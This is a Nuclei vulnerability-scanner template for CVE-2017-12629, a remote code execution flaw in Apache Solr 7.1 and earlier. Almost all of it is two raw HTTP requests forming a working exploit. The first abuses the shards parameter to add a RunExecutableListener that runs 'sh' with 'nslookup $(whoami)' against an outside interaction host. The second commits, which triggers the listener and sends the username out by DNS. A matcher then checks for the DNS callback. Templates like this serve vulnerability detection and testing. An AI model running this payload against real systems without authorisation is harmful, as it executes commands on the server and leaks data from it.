id: CVE-2017-12629

info:
  name: Apache Solr <= 7.1 Remote Code Execution via SSRF
  author: dwisiswant0
  severity: critical
  tags: cve,cve2017,solr,apache,rce,ssrf,oob
  reference: |
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12629
    - https://twitter.com/honoki/status/1298636315613974532/photo/1

requests:
  - raw:
      - |
        GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"